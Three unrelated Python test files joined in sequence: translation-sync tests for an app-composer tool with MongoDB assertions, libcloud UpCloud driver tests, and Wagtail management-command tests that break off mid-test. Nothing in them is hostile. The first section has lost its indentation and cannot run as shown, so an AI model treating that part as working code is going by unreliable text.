if last:
d['message{0}_{1}'.format(number_of_messages, identifier)] = "{0}{1}_{2}".format(last, number_of_messages, identifier)
if exceptions:
for exception_key, exception_value in exceptions.items():
d[exception_key] = exception_value
return d
def assertMessages(self, messages, expected_messages):
for message_key, message_value in expected_messages.items():
message = messages[message_key]
if message_value['can_edit']:
self.assertTrue(messages[message_key]['can_edit'])
else:
self.assertFalse(messages[message_key]['can_edit'])
if message_value['from_default']:
self.assertTrue(messages[message_key]['from_default'])
else:
self.assertFalse(messages[message_key]['from_default'])
self.assertEqual(message_value['source'], message['source'])
self.assertEqual(message_value['target'], message['target'])
def assertApiTranslate(self, url, lang, automatic, preview, expected_messages = None, unexpected_messages = None):
request.args = {'app_url' : url}
# Check API
results = api_translate('{0}_ALL'.format(lang), 'ALL').json
self.assertIn('automatic', results)
if automatic:
self.assertTrue(results['automatic'])
else:
self.assertFalse(results['automatic'])
self.assertIn('preview', results)
if preview:
self.assertTrue(results['preview'])
else:
self.assertFalse(results['preview'])
self.assertEquals(results['url'], url)
self.assertMessages(results['translation'], expected_messages)
if unexpected_messages:
for unexpected_key in unexpected_messages:
self.assertNotIn(unexpected_key, results['translation'])
def assertApp1(self):
self.assertAppMongoDB("es", "url1", self.build_dict(1, 4, "Mensaje", "Message"))
# Check API
# self.assertApiTranslate('http://url1/gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message1_1': dict(can_edit=False, from_default=True, source='Message1_1', target='Message1_1'),
# })
# In Spanish, the fourth message is special
self.assertApiTranslate('http://url1/gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message1_1': dict(can_edit=False, from_default=False, source='Message1_1', target='Mensaje1_1'),
'message4_1': dict(can_edit=True, from_default=True, source='Message4_1', target='Message4_1'),
})
# There is no translation to French, so it's automatic
self.assertApiTranslate('http://url1/gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message1_1': dict(can_edit=True, from_default=False, source='Message1_1', target=None),
'message4_1': dict(can_edit=True, from_default=False, source='Message4_1', target=None),
})
def assertApp2(self):
self.assertAppMongoDB("es", "url2", self.build_dict(2, 4, "NonAutomaticMensaje", "NonAutomaticMessage"))
# Check API
# self.assertApiTranslate('http://url2/gadget.xml', lang = 'en', automatic = False, preview = False, expected_messages = {
# 'message1_2': dict(can_edit=False, from_default=True, source='NonAutomaticMessage1_2', target='NonAutomaticMessage1_2'),
# })
# In Spanish, the fourth message is special
self.assertApiTranslate('http://url2/gadget.xml', lang = 'es', automatic = False, preview = False, expected_messages = {
'message1_2': dict(can_edit=False, from_default=False, source='NonAutomaticMessage1_2', target='NonAutomaticMensaje1_2'),
'message4_2': dict(can_edit=True, from_default=True, source='NonAutomaticMessage4_2', target='NonAutomaticMessage4_2'),
})
# There is no translation to French, but it's still not automatic
self.assertApiTranslate('http://url2/gadget.xml', lang = 'fr', automatic = False, preview = False, expected_messages = {
'message1_2': dict(can_edit=True, from_default=False, source='NonAutomaticMessage1_2', target=None),
'message4_2': dict(can_edit=True, from_default=False, source='NonAutomaticMessage4_2', target=None),
})
def assertApp3before(self):
# url3 hosts 2 apps, with some shared terms.
# messages 1 and 2 are "common". message 3 is of a third tool. message 4 is of tool_. messages 5 and 6 are not of any tool (and therefore, they're of all)
# First we test the first app (tool_, so messages 4, 5 and 6 apply)
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'tool_')
# Check API
# self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message4_3': dict(can_edit=False, from_default=True, source='ToolIdMessage4_3', target='ToolIdMessage4_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# In Spanish, the sixth message is special
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message4_3': dict(can_edit=False, from_default=False, source='ToolIdMessage4_3', target='ToolIdMensaje4_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# There is no translation to French, so it's automatic
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message4_3': dict(can_edit=True, from_default=False, source='ToolIdMessage4_3', target=None),
'message5_3': dict(can_edit=True, from_default=False, source='ToolIdMessage5_3', target=None),
'message6_3': dict(can_edit=True, from_default=False, source='ToolIdMessage6_3', target=None),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
#
# Then we test the second one (common_, so messages 1, 2, 5 and 6 apply)
#
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'common_')
# self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message1_3': dict(can_edit=False, from_default=True, source='ToolIdMessage1_3', target='ToolIdMessage1_3'),
# 'message2_3': dict(can_edit=False, from_default=True, source='ToolIdMessage2_3', target='ToolIdMessage2_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message1_3': dict(can_edit=False, from_default=False, source='ToolIdMessage1_3', target='ToolIdMensaje1_3'),
'message2_3': dict(can_edit=False, from_default=False, source='ToolIdMessage2_3', target='ToolIdMensaje2_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message1_3': dict(can_edit=True, from_default=False, source='ToolIdMessage1_3', target=None),
'message2_3': dict(can_edit=True, from_default=False, source='ToolIdMessage2_3', target=None),
'message5_3': dict(can_edit=True, from_default=False, source='ToolIdMessage5_3', target=None),
'message6_3': dict(can_edit=True, from_default=False, source='ToolIdMessage6_3', target=None),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
def assertApp3after(self):
# url3 hosts 2 apps, with some shared terms.
# messages 1 and 2 are "common". message 3 is of a third tool. message 4 is of tool_. messages 5 and 6 are not of any tool (and therefore, they're of all)
# First we test the first app (tool_, so messages 4, 5 and 6 apply)
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'tool_')
self.assertAppMongoDB("fr", "url3", self.build_dict(3, 6, "ToolIdMessage", exceptions = {
"message1_3": "TESTING_MESSAGE1", # From commons
"message5_3": "TESTING_MESSAGE5", # From tools
}), 'tool_')
# Check API
# self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message4_3': dict(can_edit=False, from_default=True, source='ToolIdMessage4_3', target='ToolIdMessage4_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# In Spanish, the sixth message is special
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message4_3': dict(can_edit=False, from_default=False, source='ToolIdMessage4_3', target='ToolIdMensaje4_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# There is no translation to French, so it's automatic
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message4_3': dict(can_edit=True, from_default=True, source='ToolIdMessage4_3', target="ToolIdMessage4_3"),
'message5_3': dict(can_edit=True, from_default=False, source='ToolIdMessage5_3', target="TESTING_MESSAGE5"),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target="ToolIdMessage6_3"),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
#
# Then we test the second one (common_, so messages 1, 2, 5 and 6 apply)
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'common_')
self.assertAppMongoDB("fr", "url3", self.build_dict(3, 6, "ToolIdMessage", exceptions = {
"message1_3": "TESTING_MESSAGE1", # From commons
}), 'common_')
# self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message1_3': dict(can_edit=False, from_default=True, source='ToolIdMessage1_3', target='ToolIdMessage1_3'),
# 'message2_3': dict(can_edit=False, from_default=True, source='ToolIdMessage2_3', target='ToolIdMessage2_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message1_3': dict(can_edit=False, from_default=False, source='ToolIdMessage1_3', target='ToolIdMensaje1_3'),
'message2_3': dict(can_edit=False, from_default=False, source='ToolIdMessage2_3', target='ToolIdMensaje2_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message1_3': dict(can_edit=True, from_default=False, source='ToolIdMessage1_3', target="TESTING_MESSAGE1"),
'message2_3': dict(can_edit=True, from_default=True, source='ToolIdMessage2_3', target="ToolIdMessage2_3"),
'message5_3': dict(can_edit=True, from_default=True, source='ToolIdMessage5_3', target="ToolIdMessage5_3"),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target="ToolIdMessage6_3"),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
def assertGraaspApp(self):
    """Check that the Graasp i18n app was synchronized into MongoDB.

    Verifies that the Spanish bundle stored per-URL and the one stored
    per-app are identical, and that the individual messages carry the
    expected translations.
    """
    # Uses assertEqual: assertEquals is a deprecated alias in unittest.
    resultEngUrl = mongo_translation_urls.find_one({'_id':'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/languages/en_ALL.xml'})
    resultEngApp = mongo_bundles.find_one({'_id':'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/'})
    # Per-URL and per-app records must hold the same serialized bundle.
    self.assertEqual(resultEngUrl['data'], resultEngApp['data'])
    data = json.loads(resultEngUrl['data'])
    self.assertEqual("Mensaje1_1", data['message1_1'])
    self.assertEqual("Mensaje2_1", data['message2_1'])
    self.assertEqual("Mensaje3_1", data['message3_1'])
    # message4_1 keeps its English default (no Spanish translation).
    self.assertEqual("Message4_1", data['message4_1'])
def assertGraaspAppNotFound(self):
    """Assert that no Graasp i18n bundle records exist in MongoDB."""
    url_key = 'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/languages/en_ALL.xml'
    app_key = 'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/'
    self.assertIsNone(mongo_translation_urls.find_one({'_id': url_key}))
    self.assertIsNone(mongo_bundles.find_one({'_id': app_key}))
def assertApps(self, before = True):
    """Run the per-app assertions; *before* selects app3's expected state."""
    self.assertApp1()
    self.assertApp2()
    # App 3 changes once the bundle edits are synchronized.
    (self.assertApp3before if before else self.assertApp3after)()
class TestSync(TranslatorTest):
    """End-to-end synchronization tests: app repository -> DB -> MongoDB."""

    @patch("appcomposer.translator.utils.get_cached_session")
    @patch("requests.Session")
    def test_sync(self, mock_requests, mock_requests_cached_session):
        # All HTTP traffic (plain and cached sessions) is served from fixtures.
        mock_requests().get = create_requests_mock()
        mock_requests_cached_session().get = create_requests_mock()
        graasp_oauth_login_redirect()
        # First full sync: apps and bundles must reach MongoDB.
        synchronize_apps_no_cache_wrapper("testing")
        sync_mongodb_all(None)
        self.assertApps()
        self.assertGraaspApp()
        # A second full sync must be idempotent.
        synchronize_apps_no_cache_wrapper("testing")
        sync_mongodb_all(None)
        self.assertApps(before = True)
        self.assertGraaspApp()
        # Add to commons one term which should be applied to tools too.
        request._cached_json = request.values = {
            'app_url': "http://url3/common_gadget.xml",
            'key': 'message1_3',
            'value': 'TESTING_MESSAGE1',
        }
        bundle_update('fr_ALL', 'ALL')
        # Add to tool_ one term which should not be applied to common.
        request._cached_json = request.values = {
            'app_url': "http://url3/tool_gadget.xml",
            'key': 'message5_3',
            'value': 'TESTING_MESSAGE5',
        }
        bundle_update('fr_ALL', 'ALL')
        # Incremental sync must pick up only the recent edits above.
        sync(None, only_recent = True)
        sync_mongodb_all(None)
        self.assertApps(before = False)
        self.assertGraaspApp()

    @patch("appcomposer.translator.utils.get_cached_session")
    @patch("requests.Session")
    def test_sync_single_url(self, mock_requests, mock_requests_cached_session):
        mock_requests().get = create_requests_mock()
        mock_requests_cached_session().get = create_requests_mock()
        graasp_oauth_login_redirect()
        task_sync_repo_apps_all()
        task_download_repository_apps()
        # Synchronizing a single app must not pull in unrelated apps:
        # after syncing only url1, the Graasp app must still be absent.
        task_synchronize_single_app("testing", 'http://url1/gadget.xml')
        sync_mongodb_last_hour(None)
        self.assertApp1()
        self.assertGraaspAppNotFound()
        task_synchronize_single_app("testing", 'http://composer.golabz.eu/graasp_i18n/')
        sync_mongodb_last_hour(None)
        self.assertGraaspApp()

    @patch("appcomposer.translator.utils.get_cached_session")
    def test_sync2(self, mock):
        # Same sync flow, but only the cached session is patched here.
        mock().get = create_requests_mock()
        synchronize_apps_no_cache_wrapper("testing")
        sync_mongodb_all(None)
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
from mock import Mock, call
from libcloud.common.upcloud import UpcloudCreateNodeRequestBody, UpcloudNodeDestroyer, UpcloudNodeOperations
from libcloud.common.upcloud import _StorageDevice
from libcloud.common.upcloud import UpcloudTimeoutException
from libcloud.common.upcloud import PlanPrice
from libcloud.compute.base import NodeImage, NodeSize, NodeLocation, NodeAuthSSHKey
from libcloud.test import unittest
class TestUpcloudCreateNodeRequestBody(unittest.TestCase):
    """Tests for the JSON request body built for UpCloud server creation."""

    def setUp(self):
        # A template image, the Helsinki zone and a small fixed plan are
        # shared by most of the tests below.
        self.image = NodeImage(id='01000000-0000-4000-8000-000030060200',
                               name='Ubuntu Server 16.04 LTS (Xenial Xerus)',
                               driver='',
                               extra={'type': 'template'})
        self.location = NodeLocation(id='fi-hel1', name='Helsinki #1', country='FI', driver='')
        self.size = NodeSize(id='1xCPU-1GB', name='1xCPU-1GB', ram=1024, disk=30, bandwidth=2048,
                             extra={'core_number': 1, 'storage_tier': 'maxiops'}, price=None, driver='')

    def test_creating_node_from_template_image(self):
        # Template images are cloned into the server's storage device.
        body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size)
        json_body = body.to_json()
        dict_body = json.loads(json_body)
        expected_body = {
            'server': {
                'title': 'ts',
                'hostname': 'localhost',
                'plan': '1xCPU-1GB',
                'zone': 'fi-hel1',
                'login_user': {'username': 'root',
                               'create_password': 'yes'},
                'storage_devices': {
                    'storage_device': [{
                        'action': 'clone',
                        'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
                        'storage': '01000000-0000-4000-8000-000030060200',
                        'size': 30,
                        'tier': 'maxiops',
                    }]
                },
            }
        }
        self.assertDictEqual(expected_body, dict_body)

    def test_creating_node_from_cdrom_image(self):
        # CDROM images create an empty disk and attach the image separately.
        image = NodeImage(id='01000000-0000-4000-8000-000030060200',
                          name='Ubuntu Server 16.04 LTS (Xenial Xerus)',
                          driver='',
                          extra={'type': 'cdrom'})
        body = UpcloudCreateNodeRequestBody(name='ts', image=image, location=self.location, size=self.size)
        json_body = body.to_json()
        dict_body = json.loads(json_body)
        expected_body = {
            'server': {
                'title': 'ts',
                'hostname': 'localhost',
                'plan': '1xCPU-1GB',
                'zone': 'fi-hel1',
                'login_user': {'username': 'root',
                               'create_password': 'yes'},
                'storage_devices': {
                    'storage_device': [
                        {
                            'action': 'create',
                            'size': 30,
                            'tier': 'maxiops',
                            'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
                        },
                        {
                            'action': 'attach',
                            'storage': '01000000-0000-4000-8000-000030060200',
                            'type': 'cdrom'
                        }
                    ]
                }
            }
        }
        self.assertDictEqual(expected_body, dict_body)

    def test_creating_node_using_ssh_keys(self):
        # With an SSH key, no password is generated for the login user.
        auth = NodeAuthSSHKey('sshkey')
        body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size, auth=auth)
        json_body = body.to_json()
        dict_body = json.loads(json_body)
        expected_body = {
            'server': {
                'title': 'ts',
                'hostname': 'localhost',
                'plan': '1xCPU-1GB',
                'zone': 'fi-hel1',
                'login_user': {
                    'username': 'root',
                    'ssh_keys': {
                        'ssh_key': [
                            'sshkey'
                        ]
                    },
                },
                'storage_devices': {
                    'storage_device': [{
                        'action': 'clone',
                        'size': 30,
                        'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
                        'tier': 'maxiops',
                        'storage': '01000000-0000-4000-8000-000030060200'
                    }]
                },
            }
        }
        self.assertDictEqual(expected_body, dict_body)

    def test_creating_node_using_hostname(self):
        # ex_hostname overrides the default 'localhost'.
        body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size,
                                            ex_hostname='myhost.upcloud.com')
        json_body = body.to_json()
        dict_body = json.loads(json_body)
        expected_body = {
            'server': {
                'title': 'ts',
                'hostname': 'myhost.upcloud.com',
                'plan': '1xCPU-1GB',
                'zone': 'fi-hel1',
                'login_user': {'username': 'root',
                               'create_password': 'yes'},
                'storage_devices': {
                    'storage_device': [{
                        'action': 'clone',
                        'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
                        'storage': '01000000-0000-4000-8000-000030060200',
                        'tier': 'maxiops',
                        'size': 30
                    }]
                },
            }
        }
        self.assertDictEqual(expected_body, dict_body)

    def test_creating_node_with_non_default_username(self):
        # ex_username replaces 'root' as the login user.
        body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size,
                                            ex_username='someone')
        json_body = body.to_json()
        dict_body = json.loads(json_body)
        login_user = dict_body['server']['login_user']
        self.assertDictEqual({'username': 'someone', 'create_password': 'yes'}, login_user)
class TestStorageDevice(unittest.TestCase):
    """Tests for the storage tier selection of _StorageDevice."""

    def setUp(self):
        self.image = NodeImage(id='01000000-0000-4000-8000-000030060200',
                               name='Ubuntu Server 16.04 LTS (Xenial Xerus)',
                               driver='',
                               extra={'type': 'template'})
        self.size = NodeSize(id='1xCPU-1GB', name='1xCPU-1GB', ram=1024, disk=30, bandwidth=2048,
                             extra={'core_number': 1}, price=None, driver='')

    def _first_device_tier(self):
        # Build the device dict and return the tier of its first entry.
        device = _StorageDevice(self.image, self.size)
        return device.to_dict()['storage_device'][0]['tier']

    def test_storage_tier_default_value(self):
        # Without an explicit storage_tier, 'maxiops' is assumed.
        self.assertEqual(self._first_device_tier(), 'maxiops')

    def test_storage_tier_given(self):
        # An explicit storage_tier in the size extras wins.
        self.size.extra['storage_tier'] = 'hdd'
        self.assertEqual(self._first_device_tier(), 'hdd')
class TestUpcloudNodeDestroyer(unittest.TestCase):
    """Tests for UpcloudNodeDestroyer's stop-then-destroy state machine."""

    def setUp(self):
        # sleep_func is injected so the tests never actually sleep.
        self.mock_sleep = Mock()
        self.mock_operations = Mock(spec=UpcloudNodeOperations)
        self.destroyer = UpcloudNodeDestroyer(self.mock_operations, sleep_func=self.mock_sleep)

    def test_node_already_in_stopped_state(self):
        self.mock_operations.get_node_state.side_effect = ['stopped']
        self.assertTrue(self.destroyer.destroy_node(1))
        # Already stopped: destroy directly, never issue a stop.
        self.assertTrue(self.mock_operations.stop_node.call_count == 0)
        self.mock_operations.destroy_node.assert_called_once_with(1)

    def test_node_in_error_state(self):
        self.mock_operations.get_node_state.side_effect = ['error']
        # Error state: give up without stopping or destroying.
        self.assertFalse(self.destroyer.destroy_node(1))
        self.assertTrue(self.mock_operations.stop_node.call_count == 0)
        self.assertTrue(self.mock_operations.destroy_node.call_count == 0)

    def test_node_in_started_state(self):
        # Started nodes are stopped first, then destroyed.
        self.mock_operations.get_node_state.side_effect = ['started', 'stopped']
        self.assertTrue(self.destroyer.destroy_node(1))
        self.mock_operations.stop_node.assert_called_once_with(1)
        self.mock_operations.destroy_node.assert_called_once_with(1)

    def test_node_in_maintenace_state(self):
        # Maintenance: sleep between polls until the node disappears (None).
        self.mock_operations.get_node_state.side_effect = ['maintenance', 'maintenance', None]
        self.assertTrue(self.destroyer.destroy_node(1))
        self.mock_sleep.assert_has_calls([call(self.destroyer.WAIT_AMOUNT), call(self.destroyer.WAIT_AMOUNT)])
        self.assertTrue(self.mock_operations.stop_node.call_count == 0)
        self.assertTrue(self.mock_operations.destroy_node.call_count == 0)

    def test_node_statys_in_started_state_for_awhile(self):
        self.mock_operations.get_node_state.side_effect = ['started', 'started', 'stopped']
        self.assertTrue(self.destroyer.destroy_node(1))
        # Only one call to stop should be done
        self.mock_operations.stop_node.assert_called_once_with(1)
        self.mock_sleep.assert_has_calls([call(self.destroyer.WAIT_AMOUNT)])
        self.mock_operations.destroy_node.assert_called_once_with(1)

    def test_reuse(self):
        """Verify that internal flag self.destroyer._stop_node is handled properly"""
        self.mock_operations.get_node_state.side_effect = ['started', 'stopped', 'started', 'stopped']
        self.assertTrue(self.destroyer.destroy_node(1))
        self.assertTrue(self.destroyer.destroy_node(1))
        self.assertEqual(self.mock_sleep.call_count, 0)
        # stop_node must be issued again for the second destroy.
        self.assertEqual(self.mock_operations.stop_node.call_count, 2)

    def test_timeout(self):
        # A node stuck in maintenance eventually raises a timeout.
        self.mock_operations.get_node_state.side_effect = ['maintenance'] * 50
        self.assertRaises(UpcloudTimeoutException, self.destroyer.destroy_node, 1)

    def test_timeout_reuse(self):
        """Verify sleep count is handled properly"""
        self.mock_operations.get_node_state.side_effect = ['maintenance'] * 50
        self.assertRaises(UpcloudTimeoutException, self.destroyer.destroy_node, 1)
        # After a timeout, the destroyer must be usable again.
        self.mock_operations.get_node_state.side_effect = ['maintenance', None]
        self.assertTrue(self.destroyer.destroy_node(1))
class TestPlanPrice(unittest.TestCase):
    """Tests for PlanPrice's zone-specific plan price lookup."""

    def setUp(self):
        zone_prices = [
            {'name': 'uk-lon1', 'server_plan_1xCPU-1GB': {'amount': 1, 'price': 1.488}},
            {'name': 'fi-hel1', 'server_plan_1xCPU-1GB': {'amount': 1, 'price': 1.588}},
        ]
        self.pp = PlanPrice(zone_prices)

    def test_zone_prices(self):
        # The Helsinki zone carries its own price for the plan.
        helsinki = NodeLocation(id='fi-hel1', name='Helsinki #1', country='FI', driver=None)
        self.assertEqual(self.pp.get_price('1xCPU-1GB', helsinki), 1.588)

    def test_plan_not_found_in_zone(self):
        # Unknown zones yield no price at all.
        nowhere = NodeLocation(id='no_such_location', name='', country='', driver=None)
        self.assertIsNone(self.pp.get_price('1xCPU-1GB', nowhere))

    def test_no_location_given(self):
        # Without a location there is no zone to resolve the price from.
        self.assertIsNone(self.pp.get_price('1xCPU-1GB'))
if __name__ == '__main__':
    # Propagate the unittest exit status to the shell.
    sys.exit(unittest.main())
|
|
from datetime import timedelta
from six import StringIO
from django.test import TestCase
from django.core import management
from django.utils import timezone
from wagtail.wagtailcore.models import Page, PageRevision
from wagtail.wagtailcore.signals import page_published, page_unpublished
from wagtail.tests.models import SimplePage
class TestFixTreeCommand(TestCase):
    """Tests for the ``fixtree`` management command."""
    fixtures = ['test.json']

    def run_command(self):
        management.call_command('fixtree', interactive=False, stdout=StringIO())

    def _assert_repairs(self, attribute):
        # Corrupt the given tree bookkeeping attribute on the homepage,
        # run the command, and verify the original value is restored.
        homepage = Page.objects.get(url_path='/home/')
        original_value = getattr(homepage, attribute)
        setattr(homepage, attribute, 12345)
        homepage.save()
        # Confirm the corruption reached the database.
        self.assertEqual(getattr(Page.objects.get(url_path='/home/'), attribute), 12345)
        self.run_command()
        # The command must have restored the correct value.
        self.assertEqual(getattr(Page.objects.get(url_path='/home/'), attribute), original_value)

    def test_fixes_numchild(self):
        self._assert_repairs('numchild')

    def test_fixes_depth(self):
        self._assert_repairs('depth')
class TestMovePagesCommand(TestCase):
    """Tests for the ``move_pages`` management command."""
    fixtures = ['test.json']

    def run_command(self, from_, to):
        management.call_command('move_pages', str(from_), str(to), interactive=False, stdout=StringIO())

    def test_move_pages(self):
        # Get pages
        events_index = Page.objects.get(url_path='/home/events/')
        about_us = Page.objects.get(url_path='/home/about-us/')
        # Materialize the ids NOW: the queryset is lazy, and evaluating it
        # after the move would query the children of the (then empty) old
        # parent, making the assertion loop below run zero times.
        page_ids = list(events_index.get_children().values_list('id', flat=True))
        # Guard against a vacuously-passing test.
        self.assertTrue(page_ids)
        # Move all events into "about us"
        self.run_command(events_index.id, about_us.id)
        # Check that all pages moved
        for page_id in page_ids:
            self.assertEqual(Page.objects.get(id=page_id).get_parent(), about_us)
class TestReplaceTextCommand(TestCase):
    """Tests for the ``replace_text`` management command."""
    fixtures = ['test.json']

    def run_command(self, from_text, to_text):
        management.call_command('replace_text', from_text, to_text, interactive=False, stdout=StringIO())

    def test_replace_text(self):
        christmas_path = '/home/events/christmas/'
        # Sanity check: the page starts out as a Christmas page.
        self.assertEqual(Page.objects.get(url_path=christmas_path).title, "Christmas")
        # Rewrite every occurrence of the text.
        self.run_command("Christmas", "Easter")
        # The title must now mention Easter instead.
        self.assertEqual(Page.objects.get(url_path=christmas_path).title, "Easter")
class TestPublishScheduledPagesCommand(TestCase):
    """Tests for the ``publish_scheduled_pages`` management command."""

    def setUp(self):
        # Find root page
        self.root_page = Page.objects.get(id=2)

    def _record_signal(self, signal):
        """Connect a recording handler to *signal*.

        Returns a dict with ``fired`` and ``page`` keys that the handler
        updates.  The handler is disconnected via ``addCleanup`` so it
        cannot leak into other tests (the original code never
        disconnected its handlers).
        """
        record = {'fired': False, 'page': None}

        def handler(sender, instance, **kwargs):
            record['fired'] = True
            record['page'] = instance

        signal.connect(handler)
        self.addCleanup(signal.disconnect, handler)
        return record

    def test_go_live_page_will_be_published(self):
        # Record firings of the page_published signal.
        record = self._record_signal(page_published)
        page = SimplePage(
            title="Hello world!",
            slug="hello-world",
            live=False,
            go_live_at=timezone.now() - timedelta(days=1),
        )
        self.root_page.add_child(instance=page)
        page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
        p = Page.objects.get(slug='hello-world')
        self.assertFalse(p.live)
        self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
        management.call_command('publish_scheduled_pages')
        p = Page.objects.get(slug='hello-world')
        self.assertTrue(p.live)
        # Publishing consumes the approved revision.
        self.assertFalse(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
        # Check that the page_published signal was fired
        self.assertTrue(record['fired'])
        self.assertEqual(record['page'], page)
        self.assertEqual(record['page'], record['page'].specific)

    def test_future_go_live_page_will_not_be_published(self):
        page = SimplePage(
            title="Hello world!",
            slug="hello-world",
            live=False,
            go_live_at=timezone.now() + timedelta(days=1),
        )
        self.root_page.add_child(instance=page)
        page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
        p = Page.objects.get(slug='hello-world')
        self.assertFalse(p.live)
        self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
        management.call_command('publish_scheduled_pages')
        p = Page.objects.get(slug='hello-world')
        # The go-live date is in the future, so nothing must change.
        self.assertFalse(p.live)
        self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())

    def test_expired_page_will_be_unpublished(self):
        # Record firings of the page_unpublished signal.
        record = self._record_signal(page_unpublished)
        page = SimplePage(
            title="Hello world!",
            slug="hello-world",
            live=True,
            expire_at=timezone.now() - timedelta(days=1),
        )
